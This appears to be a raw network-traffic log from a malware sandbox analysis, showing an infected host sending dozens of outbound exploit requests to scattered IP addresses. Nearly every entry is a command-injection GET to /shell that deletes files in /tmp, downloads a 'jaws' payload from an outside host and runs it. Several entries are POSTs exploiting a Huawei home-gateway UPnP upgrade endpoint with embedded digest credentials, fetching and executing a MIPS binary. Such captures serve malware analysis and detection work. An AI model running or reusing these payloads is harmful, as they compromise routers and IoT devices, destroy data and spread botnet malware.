                                                          Dec 3, 2024 23:16:44.585601091 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7192.168.2.2341910185.138.149.1680
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:44.633804083 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8192.168.2.233588853.132.117.18480
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:44.634608030 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9192.168.2.2349344129.100.184.22380
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:44.635376930 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10192.168.2.235648895.67.114.25380
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:44.636138916 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          11192.168.2.2355950198.29.2.10380
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:44.636826992 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          12192.168.2.234462045.40.116.25280
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:44.637566090 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          13192.168.2.2349530188.243.47.24980
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:44.647742987 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          14192.168.2.2337062178.209.10.7580
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:44.663994074 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          15192.168.2.2345274146.132.188.16680
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:44.668661118 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          16192.168.2.2350114120.173.20.19480
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:44.675668001 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          17192.168.2.2334932104.171.23.14580
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:44.687428951 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          18192.168.2.2353526153.112.177.22980
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:44.695692062 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          19192.168.2.2348408211.227.175.19780
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:45.511224031 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          20192.168.2.2358542152.243.171.4980
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:45.539807081 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          21192.168.2.234446679.244.180.20780
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:45.540496111 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          22192.168.2.234405452.59.102.7780
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:45.571916103 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          23192.168.2.233281812.128.53.1080
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:45.572583914 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          24192.168.2.2340424179.151.244.13980
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:45.573263884 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          25192.168.2.235761271.139.246.17480
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:45.604123116 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          26192.168.2.2334928184.86.41.5680
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:45.604844093 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          27192.168.2.2334882131.92.253.18180
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:45.605529070 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          28192.168.2.23557849.156.190.10480
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:45.667639017 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          29192.168.2.2334724175.139.215.10880
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:45.759833097 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          30192.168.2.2357244220.191.45.22680
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:45.760590076 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          31192.168.2.235289852.109.45.18280
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:45.761378050 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          32192.168.2.2355344111.129.118.14180
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:47.036360979 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          33192.168.2.2348428126.128.117.17480
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:47.037023067 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          34192.168.2.2341164180.109.221.17280
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:47.139553070 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          35192.168.2.2335072177.225.31.24480
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:47.140289068 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          36192.168.2.2356698193.187.119.180
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:47.140994072 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          37192.168.2.2355066176.205.213.1780
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:47.141731977 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          38192.168.2.2346556136.180.192.6480
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:47.142417908 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          39192.168.2.2333716219.25.117.20180
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:47.143136978 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          40192.168.2.235267883.51.41.14480
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:47.143883944 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          41192.168.2.2360554146.197.93.17780
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:47.144584894 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          42192.168.2.2340288103.214.187.22780
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:47.145282030 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          43192.168.2.2342634159.198.67.11080
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:47.146004915 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          44192.168.2.2346746175.217.230.7080
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:47.146692038 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          45192.168.2.2347196161.47.72.13080
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:47.147418976 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          46192.168.2.2355712146.160.159.12880
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:47.155608892 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          47192.168.2.2357276156.124.55.11037215
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:47.559258938 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          48192.168.2.234342220.223.0.23580
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:47.587572098 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          49192.168.2.235663089.106.217.24180
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:47.588342905 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          50192.168.2.2344250176.88.220.12380
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:47.619507074 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          51192.168.2.233981214.2.153.10280
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:47.620258093 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          52192.168.2.2357190204.71.210.3680
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:47.620898008 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          53192.168.2.2333594197.184.110.7237215
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:47.682593107 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          54192.168.2.2355264197.25.172.12437215
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:16:47.683480978 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
